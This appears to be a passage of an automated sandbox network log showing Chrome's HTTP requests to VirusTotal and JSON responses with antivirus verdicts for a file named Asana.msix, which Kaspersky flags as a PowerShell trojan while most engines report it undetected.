                                                                                                                                                                                                                    2024-04-25 19:55:56 UTC1408INData Raw: 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 4b 61 73 70 65 72 73 6b 79 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 76 65 72 73 69 6f 6e 22 3a 20 22 32 32 2e 30 2e 31 2e 32 38 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 32 35 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 6d 61 6c 69 63 69 6f 75 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 48 45 55 52 3a 54 72 6f 6a 61 6e 2e 50 6f 77 65 72 53 68 65 6c 6c 2e 41 67 65 6e 74 2e 67 65 6e 22 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "engine_name": "Kaspersky", "engine_version": "22.0.1.28", "engine_update": "20240425", "category": "malicious", "result": "HEUR:Trojan.PowerShell.Agent.gen"
                                                                                                                                                                                                                    2024-04-25 19:55:56 UTC1152INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 76 65 72 73 69 6f 6e 22 3a 20 22 32 35 2e 30 2e 30 2e 32 37 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 32 35 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 45 6d 73 69 73 6f 66 74 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22
                                                                                                                                                                                                                    Data Ascii: "engine_version": "25.0.0.27", "engine_update": "20240425", "category": "undetected", "result": null }, "Emsisoft": { "method": "
                                                                                                                                                                                                                    2024-04-25 19:55:56 UTC1408INData Raw: 20 20 20 22 72 65 73 75 6c 74 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 56 49 50 52 45 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 56 49 50 52 45 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 76 65 72 73 69 6f 6e 22 3a 20 22 36 2e 30 2e 30 2e 33 35 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 32 35 22 2c 0a 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "result": null }, "VIPRE": { "method": "blacklist", "engine_name": "VIPRE", "engine_version": "6.0.0.35", "engine_update": "20240425",


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    201192.168.2.164995874.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:56 UTC549OUTGET /ui/analyses/MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3NDkzNg== HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:57 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: b8e327d38160847b455b1105c37234f5
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:56 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:57 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    202192.168.2.164996074.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:56 UTC962OUTPOST /ui/intelligence/rules_matching_iocs HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    Content-Length: 89
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTkyMzM3NjQ0MjItWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU1LjM4Nw==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Origin: https://www.virustotal.com
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:56 UTC89OUTData Raw: 5b 7b 22 69 64 22 3a 22 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38 36 32 39 39 33 35 38 22 2c 22 74 79 70 65 22 3a 22 66 69 6c 65 22 7d 5d
                                                                                                                                                                                                                    Data Ascii: [{"id":"76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358","type":"file"}]
                                                                                                                                                                                                                    2024-04-25 19:55:57 UTC806INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 1442f8d13b5ab9d35bd65ba47240f465
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:57 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 116
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:57 UTC116INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 72 65 71 75 69 72 65 64 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "AuthenticationRequiredError", "message": "Authentication required" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    203192.168.2.164995974.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:56 UTC968OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTA1NzUxNDI0NTctWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU1LjM4OA==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:57 UTC889INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 94629c57b2b0cb663a87658ba3b0ddb8;o=1
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:57 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 35834
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:57 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:57 UTC519INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38 36 32 39 39 33 35 38 22 2c 0a 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 66 69 6c 65 22 2c 0a 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 66 69 6c 65 73 2f 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38
                                                                                                                                                                                                                    Data Ascii: { "data": { "id": "76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358", "type": "file", "links": { "self": "https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c4178
                                                                                                                                                                                                                    2024-04-25 19:55:57 UTC1408INData Raw: 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38 36 32 39 39 33 35 38 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 61 6e 69 6e 67 66 75 6c 5f 6e 61 6d 65 22 3a 20 22 41 73 61 6e 61 2e 6d 73 69 78 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 61 67 73 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 7a 69 70 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 6f 6e 67 2d 73 6c 65 65 70 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 6f 6e 74 61 69 6e 73 2d 70 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 74 65 63 74 2d 64 65 62 75 67 2d 65 6e 76 69 72 6f 6e
                                                                                                                                                                                                                    Data Ascii: 6f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358", "meaningful_name": "Asana.msix", "tags": [ "zip", "long-sleeps", "contains-pe", "detect-debug-environ
                                                                                                                                                                                                                    2024-04-25 19:55:57 UTC545INData Raw: 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 43 4d 43 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 76 65 72 73 69 6f 6e 22 3a 20 22 32 2e 34 2e 32 30 32 32 2e 31 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 32 33 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20
                                                                                                                                                                                                                    Data Ascii: acklist", "engine_name": "CMC", "engine_version": "2.4.2022.1", "engine_update": "20240423", "category": "undetected", "result": null },
                                                                                                                                                                                                                    2024-04-25 19:55:57 UTC1408INData Raw: 22 72 65 73 75 6c 74 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 53 6b 79 68 69 67 68 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 53 6b 79 68 69 67 68 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 76 65 72 73 69 6f 6e 22 3a 20 22 76 32 30 32 31 2e 32 2e 30 2b 34 30 34 35 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 32 35 22
                                                                                                                                                                                                                    Data Ascii: "result": null }, "Skyhigh": { "method": "blacklist", "engine_name": "Skyhigh", "engine_version": "v2021.2.0+4045", "engine_update": "20240425"
                                                                                                                                                                                                                    2024-04-25 19:55:57 UTC1408INData Raw: 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 53 61 6e 67 66 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 76 65 72 73 69 6f 6e 22 3a 20 22 32 2e 32 33 2e 30 2e 30 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 32 33 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 72 6f 77 64 53 74 72 69 6b 65
                                                                                                                                                                                                                    Data Ascii: "engine_name": "Sangfor", "engine_version": "2.23.0.0", "engine_update": "20240423", "category": "undetected", "result": null }, "CrowdStrike
                                                                                                                                                                                                                    2024-04-25 19:55:57 UTC1280INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 32 35 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 42 69 74 44 65 66 65 6e 64 65 72 54 68 65 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22
                                                                                                                                                                                                                    Data Ascii: "engine_update": "20240425", "category": "undetected", "result": null }, "BitDefenderTheta": { "method": "blacklist", "engine_name"
                                                                                                                                                                                                                    2024-04-25 19:55:57 UTC1408INData Raw: 6c 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 32 35 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 45 53 45 54 2d 4e 4f 44 33 32 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f
                                                                                                                                                                                                                    Data Ascii: l, "engine_update": "20240425", "category": "undetected", "result": null }, "ESET-NOD32": { "method": "blacklist", "engine_
                                                                                                                                                                                                                    2024-04-25 19:55:57 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 4b 61 73 70 65 72 73 6b 79 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 4b 61 73 70 65 72 73 6b 79 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 76 65 72 73 69 6f 6e 22 3a 20 22
                                                                                                                                                                                                                    Data Ascii: "category": "undetected", "result": null }, "Kaspersky": { "method": "blacklist", "engine_name": "Kaspersky", "engine_version": "
                                                                                                                                                                                                                    2024-04-25 19:55:57 UTC1408INData Raw: 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 52 69 73 69 6e 67 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 52 69 73 69 6e 67 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 76 65 72 73 69 6f 6e 22 3a 20 22 32 35 2e 30 2e 30 2e 32 37 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75
                                                                                                                                                                                                                    Data Ascii: ed", "result": null }, "Rising": { "method": "blacklist", "engine_name": "Rising", "engine_version": "25.0.0.27", "engine_u
                                                                                                                                                                                                                    2024-04-25 19:55:57 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 56 49 50 52 45 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 76 65 72 73 69 6f 6e 22 3a 20 22 36 2e 30 2e 30 2e 33 35 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 32 35 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 6d 61 6c 69 63 69 6f 75 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 48 65 75 72
                                                                                                                                                                                                                    Data Ascii: "method": "blacklist", "engine_name": "VIPRE", "engine_version": "6.0.0.35", "engine_update": "20240425", "category": "malicious", "result": "Heur


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    204192.168.2.164996274.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:56 UTC957OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/dropped_files HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
